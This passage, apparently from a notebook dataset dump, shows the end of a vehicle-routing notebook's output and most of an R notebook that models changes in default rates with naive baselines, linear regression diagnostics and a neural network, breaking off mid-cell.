64:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 65:\nSTART -> 40612 -> 40067 -> 40059 -> 60059 -> 60067 -> 60612 -> END\nDistance of the route: 188m\n\nRoute for vehicle 66:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 67:\nSTART -> 46532 -> 46449 -> 42964 -> 62964 -> 66449 -> 66532 -> END\nDistance of the route: 199m\n\nRoute for vehicle 68:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 69:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 70:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 71:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 72:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 73:\nSTART -> 44572 -> 43842 -> 43003 -> 46239 -> 46102 -> 63003 -> 66102 -> 64572 -> 63842 -> 66239 -> END\nDistance of the route: 247m\n\nRoute for vehicle 74:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 75:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 76:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 77:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 78:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 79:\nSTART -> 41206 -> 40511 -> 40084 -> 45972 -> 60084 -> 60511 -> 43170 -> 61206 -> 44123 -> 44586 -> 63170 -> 64123 -> 65972 -> 64586 -> END\nDistance of the route: 403m\n\nRoute for vehicle 80:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 81:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 82:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 83:\nSTART -> 40823 -> 42794 -> 43365 -> 43511 -> 62794 -> 60823 -> 63511 -> 63365 -> END\nDistance of the route: 192m\n\nRoute for vehicle 84:\nSTART -> 44511 -> 46389 -> 41934 -> 46145 -> 40057 -> 60057 -> 61934 -> 66389 -> 66145 -> 64511 -> END\nDistance of the route: 266m\n\nRoute for vehicle 85:\nSTART ->END\nDistance of the route: 
0m\n\nRoute for vehicle 86:\nSTART -> 41499 -> 44720 -> 43832 -> 45110 -> 63832 -> 64720 -> 65110 -> 61499 -> END\nDistance of the route: 258m\n\nRoute for vehicle 87:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 88:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 89:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 90:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 91:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 92:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 93:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 94:\nSTART -> 44826 -> 43609 -> 63609 -> 64826 -> END\nDistance of the route: 108m\n\nRoute for vehicle 95:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 96:\nSTART -> 43723 -> 45826 -> 43828 -> 45915 -> 65826 -> 63723 -> 65915 -> 63828 -> END\nDistance of the route: 185m\n\nRoute for vehicle 97:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 98:\nSTART -> 45042 -> 43349 -> 43268 -> 63349 -> 63268 -> 65042 -> END\nDistance of the route: 213m\n\nRoute for vehicle 99:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 100:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 101:\nSTART -> 42060 -> 62060 -> END\nDistance of the route: 89m\n\nRoute for vehicle 102:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 103:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 104:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 105:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 106:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 107:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 108:\nSTART -> 41634 -> 61634 -> 44869 -> 42782 -> 62782 -> 64869 -> END\nDistance of the route: 243m\n\nRoute for vehicle 109:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 110:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 111:\nSTART -> 41775 -> 46152 -> 61775 -> 43649 -> 63649 -> 66152 -> END\nDistance of the route: 237m\n\nRoute for vehicle 112:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 113:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 114:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 115:\nSTART -> 45298 -> 45078 -> 44001 -> 64001 -> 65078 -> 65298 -> END\nDistance of the route: 178m\n\nRoute for vehicle 116:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 117:\nSTART -> 43494 -> 63494 -> END\nDistance of the route: 109m\n\nRoute for vehicle 118:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 119:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 120:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 121:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 122:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 123:\nSTART -> 42271 -> 42820 -> 62271 -> 62820 -> END\nDistance of the route: 140m\n\nRoute for vehicle 124:\nSTART -> 41984 -> 44748 -> 42243 -> 62243 -> 61984 -> 64748 -> END\nDistance of the route: 173m\n\nRoute for vehicle 125:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 126:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 127:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 128:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 129:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 130:\nSTART -> 41739 -> 43273 -> 42157 -> 61739 -> 63273 -> 62157 -> END\nDistance of 
the route: 174m\n\nRoute for vehicle 131:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 132:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 133:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 134:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 135:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 136:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 137:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 138:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 139:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 140:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 141:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 142:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 143:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 144:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 145:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 146:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 147:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 148:\nSTART -> 44032 -> 64032 -> END\nDistance of the route: 82m\n\nRoute for vehicle 149:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 150:\nSTART -> 43312 -> 40038 -> 40021 -> 43320 -> 63320 -> 63312 -> 60021 -> 60038 -> END\nDistance of the route: 257m\n\nRoute for vehicle 151:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 152:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 153:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 154:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 155:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 156:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 157:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 158:\nSTART -> 42686 -> 46969 -> 46594 -> 62686 -> 66594 -> 66969 -> END\nDistance of the route: 211m\n\nRoute for vehicle 159:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 160:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 161:\nSTART -> 40076 -> 60076 -> END\nDistance of the route: 127m\n\nRoute for vehicle 162:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 163:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 164:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 165:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 166:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 167:\nSTART -> 44301 -> 43870 -> 45773 -> 64301 -> 65773 -> 63870 -> END\nDistance of the route: 235m\n\nRoute for vehicle 168:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 169:\nSTART -> 43021 -> 63021 -> END\nDistance of the route: 96m\n\nRoute for vehicle 170:\nSTART -> 40149 -> 43277 -> 60149 -> 43971 -> 63277 -> 63971 -> END\nDistance of the route: 255m\n\nRoute for vehicle 171:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 172:\nSTART -> 45609 -> 41815 -> 45160 -> 61815 -> 65609 -> 65160 -> END\nDistance of the route: 160m\n\nRoute for vehicle 173:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 174:\nSTART -> 45112 -> 41308 -> 41766 -> 61766 -> 61308 -> 44114 -> 65112 -> 64114 -> END\nDistance of the route: 209m\n\nRoute for vehicle 175:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 176:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 177:\nSTART ->END\nDistance of the route: 
0m\n\nRoute for vehicle 178:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 179:\nSTART -> 41313 -> 41438 -> 61313 -> 61438 -> END\nDistance of the route: 153m\n\nRoute for vehicle 180:\nSTART ->END\nDistance of the route: 0m\n\nRoute for vehicle 181:\nSTART -> 42880 -> 62880 -> END\nDistance of the route: 85m\n"
],
[
"try:\n out = subprocess.check_output([\"python3\", \"check.py\", DATA_IN_PATH, DATA_OUT_PATH]).decode(\"ascii\")\n out_profit = int(out[out.find(\"Profit: \") + 8:])\n \n print(\"Profit:\", out_profit)\n\n if out_profit < 0:\n with open(DATA_OUT_PATH, \"w\") as out:\n out.write(dumps([]))\n print(\"Rewritten.\")\nexcept Exception as ex:\n print(\"Test failed:\\n\", ex)",
"Profit: 10113\n"
]
],
[
[
"# Profits\n\n### Example\nExample: 2438 \nNo clustering / depots: **2498** \n\n### Simple\nExample: 1380 \nNo clustering / depots: **1596** \n\n### Hard\nNo clustering / depots: **1952**",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
e7080b116854ee8cdc474e83b6194c3294f92cf5 | 386,047 | ipynb | Jupyter Notebook | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 2a_R_models.ipynb | uhoenig/Default-Modelling | 4bdc0984bda97b84effcdac5ed1aa8bcf94eea21 | [
"MIT"
] | null | null | null | 204.799469 | 53,731 | 0.886182 | [
[
[
"# Macroeconomic default modelling - a Machine Learning approach\n\n### PART 3a",
"_____no_output_____"
],
[
"### Outline of the script(s)\n- Creating the Analytic Base Table (ABT) + Exploratory Data Analysis _(0 ABT.ipynb)_\n\n\n- Preprocessing the Dataset _(1 Preprocessing.ipynb)_\n\n\n__ Modelling changes in the default rate__ _(This Notebook)_",
"_____no_output_____"
],
[
"### First, let's load (and install where neccessary) the packages that we are using",
"_____no_output_____"
]
],
[
[
"### Load packages (and install the ones missing)\nsuppressMessages(if (!require(\"pacman\")) install.packages(\"pacman\", repos = \"http://cran.us.r-project.org\"))\n#devtools::install_github(\"business-science/alphavantager\")\n#devtools::install_github(\"business-science/tidyquant\")\n#install.packages(\"tidyquant\")\npacman::p_load(\"readxl\",\"Hmisc\",\"mice\",\n \"VIM\",\"car\",\"Amelia\", \"IRdisplay\",\n \"ggplot2\", \"dplyr\", \"caret\", \"broom\",\n \"tibble\",\"labeling\", \"digest\", \"tseries\", \n \"mombf\", \"robustbase\",\"forecast\", \"caTools\",\n \"mlbench\", \"party\", \"rpart\", \"e1071\", \"cluster\",\n \"randomForest\", \"gbm\", \"xgboost\", \"h2o\", \"timetk\",\n \"tidyquant\", \"nnet\", \"ggfortify\", \"DAAG\", \"neuralnet\")#add more packages here if needed!",
"_____no_output_____"
]
],
[
[
"### Let's get all our transformed train and test dataset (For delta-Logit PD and delta-Logit AR)",
"_____no_output_____"
]
],
[
[
"#Find a more clever way to retrieve multiple .csv later :)\n#Reminder: y_train_PD is supposed to be the delta-logit-PD (check 1_Processing script how that came about)\n#Reminder2: y_train_AR is supposed to be the delta-logit-AR (check 1_Processing script how that came about)\ndocument_name = \"ABT_train_PD\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_train_PD <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_train_PD <- as.data.frame(ABT_train_PD)\nABT_train_PD$Date = as.Date(as.character(ABT_train_PD$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_train_AR\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_train_AR <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_train_AR <- as.data.frame(ABT_train_AR)\nABT_train_AR$Date = as.Date(as.character(ABT_train_AR$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_test_PD\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_test_PD <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_test_PD <- as.data.frame(ABT_test_PD)\nABT_test_PD$Date = as.Date(as.character(ABT_test_PD$Date), \"%Y-%m-%d\")\n####################################################################\ndocument_name = \"ABT_test_AR\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\nABT_test_AR <- read.csv(file_location, stringsAsFactors = FALSE)\nABT_test_AR <- as.data.frame(ABT_test_AR)\nABT_test_AR$Date = as.Date(as.character(ABT_test_AR$Date), \"%Y-%m-%d\")",
"_____no_output_____"
]
],
[
[
"## Modeling Part\n\n### How to know if the model is best fit for your data?",
"_____no_output_____"
]
],
[
[
"document_name = \"measures.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"## 1. Naive Model (This will be our benchmark)\n\n- Always start with a Naive Approach to get the baseline error that you can measure up against future models\n\n- Last observation carrying forward as prediction (Reason: if no indication on trend available, take the last obs, as it contains most information that you can act upon",
"_____no_output_____"
]
],
[
[
"cat(\"Baseline RMSE train error for Delta-Logit-PD:\", round(sqrt(mean(diff(ABT_train_PD$y_train_PD)^2)),4), \"\\n\")\ncat(\"Baseline MAE train error for Delta-Logit-PD: \", round((mean(abs(diff(ABT_train_PD$y_train_PD)))),4), \"\\n\",\"\\n\")\ncat(\"Baseline RMSE test error for Delta-Logit-PD:\", round(sqrt(mean(diff(ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"Baseline MAE test error for Delta-Logit-PD: \", round((mean(abs(diff(ABT_test_PD$y_test_PD)))),4), \"\\n\",\"\\n\")\n\ncat(\"And now for the Delta-Logit-AR:\",\"\\n\",\"\\n\")\n\ncat(\"Baseline RMSE train error for Delta-Logit-AR:\", round(sqrt(mean(diff(ABT_train_AR$y_train_AR)^2)),4), \"\\n\")\ncat(\"Baseline MAE train error for Delta-Logit-AR: \", round((mean(abs(diff(ABT_train_AR$y_train_AR)))),4), \"\\n\",\"\\n\")\n\ncat(\"Baseline RMSE test error for Delta-Logit-AR:\", round(sqrt(mean(diff(ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"Baseline MAE test error for Delta-Logit-AR: \", round((mean(abs(diff(ABT_test_AR$y_test_AR)))),4), \"\\n\",\"\\n\")",
"Baseline RMSE train error for Delta-Logit-PD: 0.0335 \nBaseline MAE train error for Delta-Logit-PD: 0.0274 \n \nBaseline RMSE test error for Delta-Logit-PD: 0.0094 \nBaseline MAE test error for Delta-Logit-PD: 0.0078 \n \nAnd now for the Delta-Logit-AR: \n \nBaseline RMSE train error for Delta-Logit-AR: 0.1933 \nBaseline MAE train error for Delta-Logit-AR: 0.1245 \n \nBaseline RMSE test error for Delta-Logit-AR: 0.4798 \nBaseline MAE test error for Delta-Logit-AR: 0.2955 \n \n"
]
],
[
[
"### Conclusion: \n\n- As we can observe the errors are quite small for the Delta-Logit-PD Forecast\n\n\n- This indicates that a autoregressive model should be suitable (at least it tells us that past values have some for of indication)\n\n",
"_____no_output_____"
],
[
"## 2. Linear Regression\n\nThe aim of linear regression is to model a continuous variable $Y$ as a mathematical function of one or more $X$ variable(s), so that we can use this regression model to predict the Y when only the X is known. This mathematical equation can be generalized as follows:\n\n$$Y = \\beta_1 + \\beta_2 \\cdot X +\\epsilon$$\n\nwhere, $\\beta_1$ is the intercept and $\\beta_2$ is the slope. Collectively, they are called regression coefficients. $\\epsilon$ is the error term, the part of $Y$ the regression model is unable to explain.",
"_____no_output_____"
]
],
[
[
"document_name = \"LinearReg.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"### The p Value: Checking for statistical significance\n\nThe summary statistics above tells us a number of things. One of them is the model p-Value (bottom last line) and the p-Value of individual predictor variables (extreme right column under ‘Coefficients’). The p-Values are very important because, We can consider a linear model to be statistically significant only when both these p-Values are less that the pre-determined statistical significance level, which is ideally 0.05. This is visually interpreted by the significance stars at the end of the row. The more the stars beside the variable’s p-Value, the more significant the variable.\n\nNull and alternate hypothesis\nWhen there is a p-value, there is a hull and alternative hypothesis associated with it. In Linear Regression, the Null Hypothesis is that the coefficients associated with the variables is equal to zero. The alternate hypothesis is that the coefficients are not equal to zero (i.e. there exists a relationship between the independent variable in question and the dependent variable).\n\n\n### R-Squared and Adj R-Squared\n\nWhat R-Squared tells us is the proportion of variation in the dependent (response) variable that has been explained by this model.\n\n$$R^2 = 1- \\frac{\\sum_{i=1}^n (y_i - \\hat{y}_i)^2}{\\sum_{i=1}^n (y_i - \\bar{y}_i)^2}$$\n\ni.e. the ratio between sum of _squared errors_ and _sum of squared total_\n\n__Now thats about R-Squared. What about adjusted R-Squared?__ \n\nAs you add more X variables to your model, the R-Squared value of the new bigger model will always be greater than that of the smaller subset. This is because, since all the variables in the original model is also present, their contribution to explain the dependent variable will be present in the super-set as well, therefore, whatever new variable we add can only add (if not significantly) to the variation that was already explained. It is here, the adjusted R-Squared value comes to help. Adj R-Squared penalizes total value for the number of terms (read predictors) in your model. Therefore when comparing nested models, it is a good practice to look at adj-R-squared value over R-squared.\n\n$$R_{adj}^2 = 1- \\bigg(\\frac{(1-R^2)(n-1)}{n-q}\\bigg)$$\n\nWe don’t necessarily discard a model based on a low R-Squared value. Its a better practice to look at the AIC and prediction accuracy on validation sample when deciding on the efficacy of a model.\n\n\nwhere $n$ is the number of observations and $q$ is the number of coefficients in the model\n\n\n__MinMaxAccuracy__\n\n$$\\text{MinMaxAccuracy} = \\text{mean}\\bigg(\\frac{\\min(actuals, predicted)}{\\max(actuals, predicted)}\\bigg)$$\n\n\n__MeanAbsolutePercentageError (MAPE)__\n\n\n$$\\text{MAPE} = \\text{mean}\\bigg(\\frac{\\text{abs}(predicted-actuals)}{actuals}\\bigg)$$\n\n\n- Note: The MAPE can only be computed with respect to data that are guaranteed to be strictly positive, \n- so if this statistic is missing from your output where you would normally expect to see it,\n- it’s possible that it has been suppressed due to negative data values.\n\n\n__AIC and BIC__\n\nThe Akaike’s information criterion - AIC (Akaike, 1974) and the Bayesian information criterion - BIC (Schwarz, 1978) are measures of the goodness of fit of an estimated statistical model and can also be used for model selection. Both criteria depend on the maximized value of the likelihood function L for the estimated model.\n\n\n__For model comparison, the model with the lowest AIC and BIC score is preferred.__",
"_____no_output_____"
],
[
"### We train our linear model on the train dataset",
"_____no_output_____"
]
],
[
[
"linearMod_PD <- lm(y_train_PD ~ ., data=ABT_train_PD[,-1]) #remove the Date column, as it's obviously not a predictor\nlinearMod_AR <- lm(y_train_AR ~ ., data=ABT_train_AR[,-1]) #remove the Date column, as it's obviously not a predictor",
"_____no_output_____"
]
],
[
[
"### Let's investigate on some diagnostic measures.",
"_____no_output_____"
]
],
[
[
"summary(linearMod_PD)\ncat(\"####################And here below the summary for Delta-Logit-AR:#######################\",\"\\n\")\nsummary(linearMod_AR)",
"_____no_output_____"
],
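[
"# Hand computation of the fit measures described above (added for illustration;\n# not part of the original analysis). Uses linearMod_PD from the cell above.\n# Note: MinMaxAccuracy (like MAPE) is only meaningful for strictly positive\n# series, which delta-logit changes are not -- it is shown purely to make the\n# formulas concrete.\nactuals <- ABT_train_PD$y_train_PD\nfitted_vals <- fitted(linearMod_PD)\nn <- length(actuals)\nq <- length(coef(linearMod_PD)) # number of coefficients, incl. intercept\nr2 <- 1 - sum((actuals - fitted_vals)^2) / sum((actuals - mean(actuals))^2)\nadj_r2 <- 1 - ((1 - r2) * (n - 1)) / (n - q)\nmin_max_acc <- mean(pmin(actuals, fitted_vals) / pmax(actuals, fitted_vals))\ncat(\"R-squared (by hand):\", round(r2, 4), \"\\n\")\ncat(\"Adjusted R-squared (by hand):\", round(adj_r2, 4), \"\\n\")\ncat(\"MinMaxAccuracy (in-sample):\", round(min_max_acc, 4), \"\\n\")",
"_____no_output_____"
],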
[
"cat(\"The Akaike Information Criterion Score is:\", AIC(linearMod_PD),\"\\n\")\ncat(\"The Bayesian Information Criterion Score is:\", BIC(linearMod_PD),\"\\n\")\ncat(\"The Akaike Information Criterion Score is:\", AIC(linearMod_AR),\"\\n\")\ncat(\"The Bayesian Information Criterion Score is:\", BIC(linearMod_AR),\"\\n\")",
"The Akaike Information Criterion Score is: -186.5008457 \nThe Bayesian Information Criterion Score is: -162.2492269 \nThe Akaike Information Criterion Score is: -66.63523954 \nThe Bayesian Information Criterion Score is: -42.38362073 \n"
]
],
[
[
"### For assessing the appropriatness of a linear model, let's also look at \n\n- Residual vs Fitted plot\n- Normal Q-Q plot ",
"_____no_output_____"
]
],
[
[
"autoplot(linearMod_PD)",
"_____no_output_____"
],
[
"cat(\"#################And now the results for the Delta_logit-AR######################\",\"\\n\")\nautoplot(linearMod_AR)",
"#################And now the results for the Delta_logit-AR###################### \n"
]
],
[
[
"### Let's look at the train error:",
"_____no_output_____"
]
],
[
[
"cat(\"RMSE train error for Delta-Logit-PD:\", round(sqrt(mean((linearMod_PD$residuals)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-PD: \", round((mean(abs(linearMod_PD$residuals))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE train error for Delta-Logit-AR:\", round(sqrt(mean((linearMod_AR$residuals)^2)),4), \"\\n\")\ncat(\"MAE train error for Delta-Logit-AR: \", round((mean(abs(linearMod_AR$residuals))),4), \"\\n\",\"\\n\")",
"RMSE train error for Delta-Logit-PD: 0.0511 \nMAE train error for Delta-Logit-PD: 0.0409 \n \nRMSE train error for Delta-Logit-AR: 0.1249 \nMAE train error for Delta-Logit-AR: 0.0776 \n \n"
]
],
[
[
"## Conclusion\n\n- The p-value of the model is significant\n\n- The Adj. R^2 seems quite large\n\n- Most features are significant as well\n\n__BUT__\n\n- The linear model for Delta-Logit-PD performs worse in train as our baseline\n\n- The linear model for Delta-Logit-AR is not suitable at all- however, it provides a better score than the benchmark",
"_____no_output_____"
],
[
"## Predicting Linear Models",
"_____no_output_____"
]
],
[
[
"test_predictions_PD = predict(linearMod_PD, ABT_test_PD%>%select(-Date, -y_test_PD))\ntest_predictions_AR = predict(linearMod_AR, ABT_test_AR%>%select(-Date, -y_test_AR))",
"_____no_output_____"
]
],
[
[
"### Calculate prediction accuracy and error rates : Let's look at the test error",
"_____no_output_____"
]
],
[
[
"cat(\"RMSE test error for Delta-Logit-PD:\", round(sqrt(mean((test_predictions_PD - ABT_test_PD$y_test_PD)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-PD: \", round((mean(abs(test_predictions_PD - ABT_test_PD$y_test_PD))),4), \"\\n\",\"\\n\")\n\ncat(\"RMSE test error for Delta-Logit-AR:\", round(sqrt(mean((test_predictions_AR - ABT_test_AR$y_test_AR)^2)),4), \"\\n\")\ncat(\"MAE test error for Delta-Logit-AR: \", round((mean(abs(test_predictions_AR - ABT_test_AR$y_test_AR))),4), \"\\n\",\"\\n\")\n",
"RMSE test error for Delta-Logit-PD: 0.0757 \nMAE test error for Delta-Logit-PD: 0.0658 \n \nRMSE test error for Delta-Logit-AR: 0.3889 \nMAE test error for Delta-Logit-AR: 0.279 \n \n"
],
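[
"# Illustrative addition: the correlation-accuracy measure described in the next\n# cell -- the correlation between actuals and test predictions as a rough check\n# of directional agreement. Uses the predictions computed above.\ncat(\"Correlation accuracy PD (test):\", round(cor(ABT_test_PD$y_test_PD, test_predictions_PD), 4), \"\\n\")\ncat(\"Correlation accuracy AR (test):\", round(cor(ABT_test_AR$y_test_AR, test_predictions_AR), 4), \"\\n\")",
"_____no_output_____"
]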
],
[
[
"- A simple correlation between the actuals and predicted values can be used as a form of accuracy measure.\n\n\n- A higher correlation accuracy implies that the actuals and predicted values have similar directional movement, i.e. when the actuals values increase the predicteds also increase and vice-versa.",
"_____no_output_____"
],
[
"## Conclusion about Linear Regression (tbd)",
"_____no_output_____"
],
[
"## 3. Neural Net\n\n### Introduction\n\nNeural network is an information-processing machine and can be viewed as analogous to human nervous system. Just like human nervous system, which is made up of interconnected neurons, a neural network is made up of interconnected information processing units. The information processing units do not work in a linear manner. In fact, neural network draws its strength from parallel processing of information, which allows it to deal with non-linearity. Neural network becomes handy to infer meaning and detect patterns from complex data sets.\n\nNeural network is considered as one of the most useful technique in the world of data analytics. However, it is complex and is often regarded as a black box, i.e. users view the input and output of a neural network but remain clueless about the knowledge generating process. We hope that the article will help readers learn about the internal mechanism of a neural network and get hands-on experience to implement it in R.",
"_____no_output_____"
],
[
"### The Basics of Neural Network\n\nA neural network is a model characterized by an activation function, which is used by interconnected information processing units to transform input into output. A neural network has always been compared to human nervous system. Information in passed through interconnected units analogous to information passage through neurons in humans. The first layer of the neural network receives the raw input, processes it and passes the processed information to the hidden layers. The hidden layer passes the information to the last layer, which produces the output. The advantage of neural network is that it is adaptive in nature. It learns from the information provided, i.e. trains itself from the data, which has a known outcome and optimizes its weights for a better prediction in situations with unknown outcome.\n\nA perceptron, viz. single layer neural network, is the most basic form of a neural network. A perceptron receives multidimensional input and processes it using a weighted summation and an activation function. It is trained using a labeled data and learning algorithm that optimize the weights in the summation processor. A major limitation of perceptron model is its inability to deal with non-linearity. A multilayered neural network overcomes this limitation and helps solve non-linear problems. The input layer connects with hidden layer, which in turn connects to the output layer. The connections are weighted and weights are optimized using a learning rule.\n\nThere are many learning rules that are used with neural network:\n\na) least mean square\n\nb) gradient descent;\n\nc) newton’s rule;\n\nd) conjugate gradient etc.\n\nThe learning rules can be used in conjunction with backpropgation error method. The learning rule is used to calculate the error at the output unit. This error is backpropagated to all the units such that the error at each unit is proportional to the contribution of that unit towards total error at the output unit. The errors at each unit are then used to optimize the weight at each connection. Figure 1 displays the structure of a simple neural network model for better understanding.",
"_____no_output_____"
]
],
[
[
"document_name = \"nnet.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
],
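[
"# Minimal perceptron sketch (added for illustration; input, weights, bias and\n# learning rate are made-up numbers): the weighted summation plus logistic\n# activation described above, with one toy gradient-descent weight update.\nperceptron <- function(x, w, b) 1 / (1 + exp(-(sum(w * x) + b)))\nx_in <- c(0.2, -0.5, 1.0)\nw <- c(0.4, 0.1, -0.3)\nb <- 0.05\ntarget <- 1\nout <- perceptron(x_in, w, b)\ngrad <- (out - target) * out * (1 - out) * x_in # d(squared error)/dw\nw_new <- w - 0.5 * grad # one gradient-descent step, learning rate 0.5\ncat(\"output before update:\", round(out, 4),\n \"| after:\", round(perceptron(x_in, w_new, b), 4), \"\\n\")",
"_____no_output_____"
],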
[
"# fit neural network #develop flexible formula later!\nset.seed(2)\nNN_PD = neuralnet(y_train_PD ~ PC1+PC2+PC3+PC4+PC5+PC6+PC7+PC8+PC9, ABT_train_PD%>%select(-Date), hidden = 2 , linear.output = T )\nNN_AR = neuralnet(y_train_AR ~ PC1+PC2+PC3+PC4+PC5+PC6+PC7+PC8+PC9, ABT_train_AR%>%select(-Date), hidden = 2, linear.output = T )\n\n# plot neural network (import picture from R-studio... figure out why doesn't work in jupyter notebook!)\nplot(NN_PD)\nplot(NN_AR)\n",
"_____no_output_____"
],
[
"document_name = \"NN_PD.png\"\nfile_location=paste(getwd(),\"/\", document_name, sep= \"\")\n\ndisplay_png(file=file_location) ",
"_____no_output_____"
]
],
[
[
"- The black lines show the connections between each layer and the weights on each connection while the blue lines show the bias term added in each step. The bias can be thought as the intercept of a linear model.\n\n\n- The net is essentially a black box so we cannot say that much about the fitting, the weights and the model. \n\n\n- Suffice to say that the training algorithm has converged and therefore the model is ready to be used.",
"_____no_output_____"
]
],
[
[
